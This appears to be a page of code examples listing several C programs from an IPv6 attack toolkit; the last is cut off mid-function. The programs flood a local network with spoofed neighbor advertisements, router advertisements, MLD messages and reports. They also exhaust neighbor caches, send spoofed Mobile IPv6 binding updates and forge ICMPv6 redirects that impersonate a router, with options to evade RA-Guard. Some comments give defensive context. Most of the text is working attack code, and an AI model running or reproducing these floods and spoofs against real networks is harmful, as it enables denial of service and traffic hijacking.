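      fprintf(stderr, "Error: invalid mac address %s\n", argv[2]);
      exit(-1);
    }
    for (i = 0; i < 6; i++) {
      if (octet[i] > 0xff) {
        fprintf(stderr, "Error: invalid mac address %s\n", argv[2]);
        exit(-1);
      }
      srcmac[i] = (unsigned char) octet[i];
    }
    smac = srcmac;
    argv+=2;
    argc-=2;
  }
  if (smac != NULL)
    mac6 = smac;

  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if (argc == 3) {
    if ((dst = thc_resolve6(argv[2])) == NULL) {
      fprintf(stderr, "Error: invalid target IPv6 address\n");
      exit(-1);
    } else {
      dstmac = thc_get_mac(interface, NULL, dst);
    }
    // Targets whose first byte is 0x20..0xfd get a global source address.
    if (dst[0] >= 0x20 && dst[0] <= 0xfd)
      prefer = PREFER_GLOBAL;
  }

  // The address buffer is modified in place below, so it must exist.
  if ((ip6 = thc_get_own_ipv6(interface, dst, prefer)) == NULL) {
    fprintf(stderr, "Error: no usable IPv6 source address on interface %s\n", interface);
    exit(-1);
  }

  // Fixed part of the per-packet identity: MAC 00:18:.. and an interface
  // identifier of the form 02 <mac1> <mac2> ff fe <mac3> <mac4> <mac5>.
  mac[0] = 0x00;
  mac[1] = 0x18;
  memset(ip6 + 8, 0, 8);
  ip6[8] = 0x02;
  ip6[9] = mac[1];
  ip6[11] = 0xff;
  ip6[12] = 0xfe;
  // Payload: 16-byte target address, then option type 2 / length 1 with
  // the 6-byte link-layer address.
  memset(buf, 0, sizeof(buf));
  buf[16] = 2;
  buf[17] = 1;
  buf[18] = mac[0];
  buf[19] = mac[1];
  memcpy(buf, ip6, 16);
  flags = ICMP6_NEIGHBORADV_OVERRIDE;

  printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    // New random MAC tail, mirrored into the source/target address.
    for (i = 2; i < 6; i++)
      mac[i] = rand() % 256;

//    ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    count++;
    memcpy(buf + 10, ip6 + 10, 6);
    memcpy(&buf[20], mac + 2, 4);

    if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
      return -1;
    // A failed send is only marked with '!' and the loop continues.
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
//      perror("");
//      return -1;
      printf("!");
    }

    pkt = thc_destroy_packet(pkt);
//    usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}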
Пример #7
/*
 * Sends ICMPv6 messages of type ICMP6_MLD_ROUTERADV in an endless loop,
 * each from a freshly randomised link-local source address, to ff02::6a
 * or to a given destination.
 *
 * Arguments as parsed below: [-r] interface [destination].
 *
 * help() is defined outside this function.
 */
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
  unsigned char buf[6];
  unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst);
  int i;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  int count = 0;

  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  // NOTE(review): argc was checked before this shift; with "-r" as the
  // only argument argv[1] is NULL afterwards and is used as the interface.
  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  // NOTE(review): dstmac was derived from the default destination above
  // and is not recomputed when the destination is replaced here.
  if (argc > 2)
    if ((dst = thc_resolve6(argv[2])) == NULL) {
      fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
      exit(-1);
    }

  // NOTE(review): ip6 comes from thc_resolve6() and is written through
  // without a NULL check.
  memset(buf, 0, sizeof(buf));
  mac[0] = 0x00;
  mac[1] = 0x18;
  ip6[9] = mac[1];

  printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
  while (1) {

    // New random MAC tail, mirrored into the source address.
    for (i = 0; i < 4; i++)
      mac[2 + i] = rand() % 256;

//    ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];
    count++;

    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    // buf is passed with length 0, so no payload follows the ICMPv6 header.
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0)
      return -1;
    // A failed send is only marked with '!' and the loop continues.
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
//      perror("");
//      return -1;
      printf("!");
    }

    pkt = thc_destroy_packet(pkt);
//    usleep(1);
    if (count % 1000 == 0)
      printf(".");
  }
  return 0;
}
Пример #8
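/*
 * Sends ICMPv6 echo requests in an endless loop to random addresses
 * inside a given network.
 *
 * Arguments as parsed below: interface network/prefixlength [source].
 * The low (128 - prefixlength) / 8 bytes of the destination are
 * re-randomised for every packet.
 *
 * Fixes over the original: the prefix length is range-checked (a negative
 * value made numbytes exceed 16 and the loop write in front of the
 * 16-byte address), an unresolvable network is reported instead of being
 * written through, and the MAC looked up for the first packet is freed.
 */
int main(int argc, char *argv[]) {
  char *interface;
  int prefer = PREFER_GLOBAL;
  unsigned char *srcmac;
  unsigned char *dst6, *src6;
  unsigned char *ptr;
  //char dstmac[6] = "";
  unsigned char *dstmac = NULL, *tmpmac, *dstnet;
  int pkt_len = 16;
  int count = 0;
  int i;
  int size, numbytes, samenet = 0;
  unsigned char *pkt = NULL;
  unsigned char buf[] = "NDP Exhaustion";

  // hardcoded mac
  /*dstmac[0] = 0x00;
     dstmac[1] = 0x05;
     dstmac[2] = 0x73;
     dstmac[3] = 0xa0;
     dstmac[4] = 0x00;
     dstmac[5] = 0x01; */

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  if ((srcmac = thc_get_own_mac(interface)) == NULL) {
    printf("Error: invalid interface defined: %s\n", interface);
    exit(-1);
  }
  dstnet = argv[2];             // the destination network is in here
  if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }

  // Split "address/length" in place.
  *ptr++ = 0;
  size = atoi(ptr);             // prefix length
//  printf("Prefix length is %d\n", size);
  // Outside 0..128 the byte count below is negative or larger than the
  // 16-byte address it indexes.
  if (size < 0 || size > 128) {
    fprintf(stderr, "Error: prefix length must be between 0 and 128: %d\n", size);
    exit(-1);
  }
  if (size != 64)
    fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
  numbytes = (128 - size) / 8;  // number of bytes to create
//  printf("Creating %d random adress bytes\n", numbytes);
  srand(time(NULL) + getpid()); // initialize random number generator
  // dst6 is written through in the loop, so it must exist.
  if ((dst6 = thc_resolve6(dstnet)) == NULL) {
    fprintf(stderr, "Error: can not resolve %s\n", dstnet);
    exit(-1);
  }
//  thc_dump_data(dst6, 16, "dst");
  if (argc >= 4)
    src6 = thc_resolve6(argv[3]);
  else
    src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
//  thc_dump_data(src6, 16, "src");
  dstmac = thc_get_mac(interface, src6, dst6);

  printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface);
  while (1) {
    ++count;
    for (i = 0; i < numbytes; i++) {
      dst6[16 - numbytes + i] = rand() % 256;   // direct destination manipulation
    }
    if (count == 1) {
      // If the first random address resolves to the same MAC as the
      // network address, keep using that MAC for every later packet.
      tmpmac = thc_get_mac(interface, src6, dst6);
      if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0)
        samenet = 1;
      // thc_get_mac() results are heap buffers (dstmac is free()d below).
      free(tmpmac);
    } else {
      if (samenet == 0) {
        free(dstmac);
        dstmac = thc_get_mac(interface, src6, dst6);
      }
    }

    //  printf("%s\n", ip6adr);
//  printf("Sending ICMP ECHO to %s\n", ip6adr);
    if ((pkt = thc_create_ipv6(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
      errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n");
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1)
      errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n");
    //thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf));

    // A failed send is only marked with '!' and the loop continues.
    if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
      printf("!");
    thc_destroy_packet(pkt);
    usleep(1);
    if (count % 100 == 0)
      printf(".");
  }
}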
/*
 * Sends ICMPv6 Router Advertisements to FF02::1 in an endless loop, each
 * one from a freshly randomised source MAC/link-local address and
 * announcing a freshly randomised prefix.
 *
 * Arguments as parsed below: [-r] [-H] [-F ...] [-D] interface.
 *   -H  put a hop-by-hop header in front of the advertisement
 *   -F  add one one-shot fragment header per occurrence
 *   -D  add a destination header and send the result as fragments
 *
 * Defensive reference for this traffic shape: RFC 6105 (RA-Guard) and
 * RFC 7113, which covers advertisements carried behind extension headers
 * or in fragments.
 *
 * help() is defined outside this function.
 */
int main(int argc, char *argv[]) {
  char *interface, mac[6] = "";
  unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
  unsigned char buf[56], buf2[6], buf3[1504];
  unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
  int size, mtu, i, type = NXT_ICMP6;
  unsigned char *pkt = NULL;
  // NOTE(review): cnt has no initialiser and is read by cnt++ in the -F
  // branch below.
  int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt, do_dst = 0;
  thc_ipv6_hdr *hdr = NULL;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "DFHr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 1)
    help(argv[0]);


  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  // NOTE(review): the interface name is not validated here and the three
  // malloc(16) results are used unchecked.
  interface = argv[optind];
  mtu = 1500;
  size = 64;
  ip6 = malloc(16);
  routerip6 = malloc(16);
  route6 = malloc(16);

  // Fixed part of the per-packet identity: MAC 00:18:.. and the source
  // fe80::02<mac1>:<mac2>ff:fe<mac3>:<mac4><mac5>.
  mac[0] = 0x00;
  mac[1] = 0x18;
  memset(ip6, 0, 16);
  ip6[0] = 0xfe;
  ip6[1] = 0x80;
  ip6[8] = 0x02;
  ip6[9] = mac[1];
  ip6[11] = 0xff;
  ip6[12] = 0xfe;
  // Only bytes 0-7 of routerip6 are ever copied out (into route6 below).
  routerip6[0] = 0x2a;
  routerip6[1] = 0x01;
  routerip6[15] = 0x01;
  memset(route6 + 8, 0, 8);

  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  // Advertisement body: option type 5 / length 1 carrying mtu at bytes
  // 12-15, option type 3 / length 4 with the prefix length at byte 18 and
  // the 16-byte prefix at bytes 32-47, option type 1 / length 1 with the
  // MAC at bytes 50-55.
  memset(buf, 0, sizeof(buf));
  buf[1] = 250;
  buf[5] = 30;
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  buf[16] = 3;
  buf[17] = 4;
  buf[18] = size;
  buf[19] = 128 + 64 + 32;
  memset(&buf[20], 255, 8);
  buf[48] = 1;
  buf[49] = 1;

  printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
  while (1) {

    // New random MAC tail and new random prefix bytes 2-7.
    for (i = 2; i < 6; i++)
      mac[i] = rand() % 256;
    for (i = 2; i < 8; i++)
      routerip6[i] = rand() % 256;

//    ip6[9] = mac[1];
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];
    memcpy(route6, routerip6, 8);
    memcpy(&buf[32], route6, 16);
    memcpy(&buf[50], mac6, 6);

    count++;

    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    // type records the first extension header added; it is only used by
    // the fragmenting send in the -D branch and is not reset between
    // iterations.
    if (do_hop) {
      type = NXT_HBH;
      if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
        return -1;
    }
    if (do_frag) {
      if (type == NXT_ICMP6)
        type = NXT_FRAG;
      for (i = 0; i < do_frag; i++)
        if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
          return -1;
    }
    if (do_dst) {
      if (type == NXT_ICMP6)
        type = NXT_DST;
      if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
        return -1;
    }
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
      return -1;
    if (do_dst) {
      // Build the frame without sending it, then send everything after the
      // 14-byte link header and 40-byte IPv6 header as fragments.
      // NOTE(review): return values of both calls are ignored here.
      thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len);
      hdr = (thc_ipv6_hdr *) pkt;
      thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + 14, hdr->pkt_len - 40 - 14, 1240);
    } else {
      if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
        fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
        perror("");
        return -1;
      }
    }

    pkt = thc_destroy_packet(pkt);
//    usleep(1);
    if (count % 100 == 0)
      printf(".");
  }
  return 0;
}
Пример #10
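/*
 * Entry point: builds and sends four Mobile IPv6 mobility-header packets
 * from <care-of-address> to <home-agent>, each carrying <home-address> in a
 * destination-options header.
 *
 * Arguments (after an optional leading "-r" for raw mode):
 *   interface home-address home-agent-address care-of-address
 *
 * Returns 0 after the fourth packet and -1 if a packet could not be built;
 * exits with -1 on bad arguments or an unusable interface.
 *
 * Uses the scratch buffer `buf` and its length `buf_len`, both declared
 * outside this function.
 * NOTE(review): the writes below need buf to hold at least 32 bytes -
 * confirm against its declaration.
 *
 * Defensive context: the byte values written below look like the RFC 6275
 * Home Address option (type 201) and a Binding Update (MH type 5) - confirm
 * against the RFC. RFC 6275 expects Binding Updates sent to a home agent to
 * be protected by IPsec, so a home agent enforcing that requirement rejects
 * unauthenticated messages of this shape.
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL;
  unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
  int pkt1_len = 0, rawmode = 0;
  unsigned int id = 2, i;
  char *interface, *prog = argv[0];
  thc_ipv6_hdr *hdr;

  /* four positional arguments are read below, so argv[4] must exist */
  if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) {
    help(prog);
    exit(-1);                   /* only reached if help() returns */
  }

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  /* re-check after "-r" was consumed: it shifted every positional argument */
  if (argc < 5) {
    help(prog);
    exit(-1);
  }

  interface = argv[1];
  if ((h = thc_resolve6(argv[2])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[2]);
    exit(-1);
  }
  if ((ha = thc_resolve6(argv[3])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
    exit(-1);
  }
  if ((coa = thc_resolve6(argv[4])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[4]);
    exit(-1);
  }

  /* the MAC looked up here is the one for the home agent (argv[3]) */
  if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[3]);
    exit(-1);
  }

  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  for (i = 0; i < 4; i++) {
    /* destination-options payload: 1,2,0,0 then option type 201, length 16, then h */
    memset(buf, 0, sizeof(buf));
    buf[0] = 1;
    buf[1] = 2;
    buf[4] = 201;
    buf[5] = 16;
    memcpy(&buf[6], h, 16);
    buf_len = 22;

    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt1;
    hdr->original_src = h;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
      return -1;

    /* mobility header payload: bytes 6-7 carry `id` big-endian, coa at 16..31 */
    memset(buf, 0, sizeof(buf));
    buf[0] = 59;
    buf[1] = 3;
    buf[2] = 5;
    buf[3] = 0;
    buf[6] = (id % 65536) / 256;
    buf[7] = id % 256;
    buf[8] = 192;
    buf[10] = 0xff;
    buf[11] = 0xff;
    buf[12] = 1;
    buf[14] = 3;
    buf[15] = 16;
    memcpy(&buf[16], coa, 16);
    buf_len = 32;
    if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
      return -1;

    /* best effort as before: report a failed send but keep going */
    if (thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len) < 0)
      fprintf(stderr, "Warning: could not send packet no. %u on interface %s\n", i + 1, interface);

    /* NOTE(review): pkt1 is not released between iterations. Whether
     * thc_destroy_packet() also frees hdr->original_src (h is reused in the
     * next pass) is not visible here, so the packet is left alone. */
    id += 16384;
  }

  return 0;
}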
Пример #11
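/*
 * Entry point: sends MLDv2 report messages to ff02::16 in an endless loop,
 * each from a freshly randomised source MAC and link-local address.
 *
 * Arguments: [-r] interface
 *
 * Every report carries RECORD_NUMBER records of 36 bytes each:
 *   byte 0       record type (3)
 *   byte 3       number of sources (1)
 *   bytes 4-19   multicast address, ff02:: with the last six bytes random
 *   bytes 20-35  one source address (the spoofed link-local address)
 * A six-byte hop-by-hop payload {5, 2, 0, 0, 0, 0} is placed in front of it;
 * presumably the Router Alert option - confirm.
 *
 * Only returns (-1) when a packet cannot be built; otherwise it runs until
 * the process is interrupted.
 *
 * Defensive context: on the wire this is a stream of MLDv2 reports whose
 * source MAC always starts 00:18 and changes with every frame, with source
 * addresses of the form fe80::18:XXff:feXX:XXXX. Per-port limits on learned
 * MAC addresses and rate limits on MLD snooping state bound the effect.
 */
int main(int argc, char *argv[]) {
  char *interface, *prog = argv[0];
  unsigned char mac[6] = { 0 };
  unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
  unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)];
  unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst);
  int i, j;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  int count = 0;

  if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) {
    help(prog);
    exit(-1);                   /* only reached if help() returns */
  }

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  /* "-r" on its own leaves no interface argument behind */
  if (argc < 2) {
    help(prog);
    exit(-1);
  }

  /* ip6 is written through directly below, so it must have resolved */
  if (ip6 == NULL) {
    fprintf(stderr, "Error: could not set up the source address\n");
    exit(-1);
  }

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];

  /* fixed MAC prefix 00:18; the remaining four bytes are randomised per packet */
  mac[0] = 0x00;
  mac[1] = 0x18;
  ip6[9] = mac[1];
  memset(buf, 0, sizeof(buf));
  buf[0] = 5;
  buf[1] = 2;
  memset(buf2, 0, sizeof(buf2));
  for (i = 0; i < RECORD_NUMBER; i++) {
    buf2[0 + i * 36] = 3;       // CHANGE_TO_INCLUDE_MODE
    buf2[3 + i * 36] = 1;
    buf2[4 + i * 36] = 0xff;
    buf2[5 + i * 36] = 0x02;
    memcpy(buf2 + 20 + i * 36, ip6, 16);
  }

  printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
  while (1) {

    for (i = 0; i < 4; i++)
      mac[2 + i] = rand() % 256;

    /* mirror the random MAC bytes into the interface identifier */
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    for (i = 0; i < RECORD_NUMBER; i++) {
      /* last six bytes of the record's multicast address */
      for (j = 0; j < 6; j++)
        buf2[14 + j + i * 36] = rand() % 256;
      /* bytes 9..15 of the record's source address follow the new ip6 */
      memcpy(buf2 + 29 + i * 36, ip6 + 9, 7);
    }
    count++;

    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0)
      return -1;
    /* a failed send is deliberately non-fatal here: it is marked with '!' */
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
      printf("!");

    pkt = thc_destroy_packet(pkt);
    if (count % 100 == 0)
      printf(".");
  }
  return 0;
}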
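/*
 * Entry point: sends ICMPv6 neighbor advertisements to FF02::1 in an endless
 * loop, each announcing a freshly randomised link-local address and MAC.
 *
 * Arguments: [-r] interface
 *
 * The 24-byte ICMPv6 payload is laid out as
 *   bytes 0-15   target address (same as the spoofed source address)
 *   byte 16      option type 2, byte 17 option length 1
 *   bytes 18-23  link-layer address (the spoofed MAC)
 * and every message is sent with ICMP6_NEIGHBORADV_OVERRIDE set.
 *
 * Returns -1 when a packet cannot be built or sent; otherwise it runs until
 * the process is interrupted.
 *
 * Defensive context: on the wire this is a stream of neighbor advertisements
 * to all-nodes whose source MAC always starts 00:18 and whose source address
 * has the form fe80::218:XXff:feXX:XXXX, changing with every frame.
 * Neighbor-cache size limits and per-port limits on learned MAC/IPv6
 * addresses (first-hop security features such as ND inspection) bound the
 * effect.
 */
int main(int argc, char *argv[]) {
  char *interface, *prog = argv[0];
  unsigned char mac[6] = { 0 };
  unsigned char *mac6 = mac, *ip6;
  unsigned char buf[24];
  unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
  int i;
  unsigned char *pkt = NULL;
  int pkt_len = 0, flags, rawmode = 0, count = 0;

  if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) {
    help(prog);
    exit(-1);                   /* only reached if help() returns */
  }

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  /* "-r" on its own leaves no interface argument behind */
  if (argc < 2) {
    help(prog);
    exit(-1);
  }

  srand(time(NULL) + getpid());
  setvbuf(stdout, NULL, _IONBF, 0);

  interface = argv[1];

  /* calloc gives the zeroed 16-byte address the original built with memset */
  ip6 = calloc(16, 1);
  if (ip6 == NULL) {
    fprintf(stderr, "Error: out of memory\n");
    exit(-1);
  }

  /* fixed MAC prefix 00:18; fe80::/64 plus an EUI-64 style identifier */
  mac[0] = 0x00;
  mac[1] = 0x18;
  ip6[0] = 0xfe;
  ip6[1] = 0x80;
  ip6[8] = 0x02;
  ip6[9] = mac[1];
  ip6[11] = 0xff;
  ip6[12] = 0xfe;
  memset(buf, 0, sizeof(buf));
  buf[16] = 2;
  buf[17] = 1;
  buf[18] = mac[0];
  buf[19] = mac[1];
  memcpy(buf, ip6, 16);

  printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
  while (1) {

    for (i = 2; i < 6; i++)
      mac[i] = rand() % 256;

    /* mirror the random MAC bytes into the interface identifier */
    ip6[10] = mac[2];
    ip6[13] = mac[3];
    ip6[14] = mac[4];
    ip6[15] = mac[5];

    count++;
    /* refresh the parts of the payload that depend on the new address and MAC */
    memcpy(buf + 10, ip6 + 10, 6);
    memcpy(&buf[20], mac + 2, 4);
    flags = ICMP6_NEIGHBORADV_OVERRIDE;

    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
      return -1;
    if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
      perror("");
      return -1;
    }

    pkt = thc_destroy_packet(pkt);
    if (count % 100 == 0)
      printf(".");
  }
  return 0;
}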
Пример #13
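/*
 * Entry point: sends one ICMPv6 echo request with a spoofed source, then an
 * ICMPv6 redirect (via thc_redir6) that names <new-router> as the better
 * next hop and quotes the inverted echo packet.
 *
 * Arguments (after an optional leading "-r" for raw mode):
 *   interface src target original-router new-router [new-router-mac] [hop-limit]
 *
 * The optional MAC is given as six colon-separated hex bytes; without it the
 * interface's own MAC is used. The hop limit defaults to 64 and falls back
 * to 64 when it is outside 1..255.
 *
 * Returns 0 after the redirect was handed to thc_redir6, -1 if the echo
 * packet could not be built; exits with -1 on invalid arguments or when an
 * address or MAC cannot be resolved.
 *
 * Defensive context: the redirect is sent with the original router's address
 * and MAC as its source. Hosts that do not need redirects can ignore them
 * (on Linux: net.ipv6.conf.<if>.accept_redirects=0), and first-hop filtering
 * of ICMPv6 redirects on access ports removes the exposure for a segment.
 */
int main(int argc, char *argv[]) {
    unsigned char *pkt = NULL, buf[16], mac[16] = "";
    unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac;
    thc_ipv6_hdr *ipv6;
    char *interface, *prog = argv[0];
    unsigned int mac_in[6];
    long ttl_arg;
    int k;
    int pkt_len = 0, rawmode = 0, ttl = 64, offset = 14;

    if (argc < 6 || strncmp(argv[1], "-h", 2) == 0) {
        help(prog);
        exit(-1);               /* only reached if help() returns */
    }

    if (strcmp(argv[1], "-r") == 0) {
        thc_ipv6_rawmode(1);
        rawmode = 1;
        argv++;
        argc--;
    }

    /* re-check after "-r" was consumed: argv[5] is read below */
    if (argc < 6) {
        help(prog);
        exit(-1);
    }

    if (do_hdr_size)
        offset = do_hdr_size;
    interface = argv[1];
    if ((src6 = thc_resolve6(argv[2])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[2]);
        exit(-1);
    }
    if ((target6 = thc_resolve6(argv[3])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]);
        exit(-1);
    }
    if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[4]);
        exit(-1);
    }
    if ((newrouter6 = thc_resolve6(argv[5])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]);
        exit(-1);
    }

    if (thc_get_own_mac(interface) == NULL) {
        fprintf(stderr, "Error: invalid interface %s\n", interface);
        exit(-1);
    }
    /* The original router's MAC is used as the frame source further down */
    if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) {
        fprintf(stderr, "Error: could not get own IP address to contact original-router\n");
        exit(-1);
    }
    if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) {
        fprintf(stderr, "Error: could not resolve mac address for original-router\n");
        free(self6);
        exit(-1);
    }

    if (rawmode == 0) {
        if (argc >= 7) {
            /* Parse into full-width integers first: %x stores an unsigned int,
             * so scanning straight into the byte array writes past each
             * element and depends on byte order. */
            if (sscanf(argv[6], "%x:%x:%x:%x:%x:%x", &mac_in[0], &mac_in[1], &mac_in[2], &mac_in[3], &mac_in[4], &mac_in[5]) != 6) {
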